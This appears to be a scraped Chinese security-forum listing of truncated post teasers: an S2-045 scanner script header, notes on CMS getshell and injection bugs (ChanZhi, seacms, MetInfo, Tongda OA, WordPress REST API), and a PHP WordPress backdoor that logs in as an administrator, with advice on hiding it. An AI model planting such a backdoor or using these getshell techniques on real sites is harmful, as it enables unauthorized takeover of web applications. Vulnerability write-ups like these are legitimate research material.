s2-045百度搜索结果多线程测试.py

#!/usr/bin/env python # coding=utf-8 # author : kris # mail: [email][email protected][/email]   import sys import re import threading import requests import Queue import urllib2  

Test404漏洞扫描器 (Struts2-045插件)

QQͼƬ20170307161719.png

Struts2远程命令执行漏洞 S2-045

漏洞简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2框架存在多个远程代码执行(S2-005、S2-009、S2-013、S2-016、S2-019、S2-020、S2-037、devmode),恶意攻击者可利用漏洞直接获取应用系统的Webshell,甚至获取操作系统以及数据库的权限。漏洞编号:S2-045 CVE编号:CVE-201

蝉知getshell

漏洞文件:
/system/module/file/model.php

public function pasteImage($data, $uid)
    {
      
        $data = str_replace('"', '"', $data);
  
        if(!$this->checkSavePath()) return false;
        ini_set('pcre.backtrack_limit', strlen($data));
        preg_match_all('/<img src="(data:image/(S+);base64,(S+))" .+ />/U', $data, $out);
        foreach($out[3] as $key => $base64Image)


seacms最新版前台getshell

seacms最新版前台getshell

MetInfo 5.3.12 注入漏洞

最新版尝试通过,具体的版本为5.3.12.这是一个比较老的漏洞了,不知道为什么,metinfo 还是没有修复,网上的介绍都比较简单,我这里就详细的解释一下\app\system\include\compatible\metv5_top.php//获取当前应用栏目信息 $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER[&#3

通达oa前台注入+后台getshell

注入分析\inc\common.inc.php<?php function SecureRequest(&$var) {     if (is_array($var)) {         foreach ($var as $_k => $_v ) { &n

WordPress REST API 内容注入漏洞

1.漏洞信息:WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。在4.7.0版本后,REST API插件的功能被集成到WordPress中,由此也引发了一些安全性问题。近日,一个由REST API引起的影响WorePress4.7.0和4.7.1版本的漏洞被披露,该漏洞可以导致WordPress所有文章内容可以未经验证被查看,修改,删除,甚至创建新的文章,危害巨大。2.漏洞影响版本:WordPress 4.7.0 WordPress 4.7.13.复现环境:A

IoTSeeker:物联网设备默认密码扫描检测工具

14828134627729.jpg

猥琐的wordpress后门

一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php

    require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
    $query_str = "SELECT ID FROM $wpdb->users";
    $user_ids = $wpdb->get_results($query_str);
    foreach ($user_ids as $uid) {
        $user_id = $uid->ID;
        if (user_can($user_id, 'administrator')) {
            $user_info = get_userdata($user_id);
            $user_login = $user_info->user_login;
            wp_set_current_user($user_id, $user_login);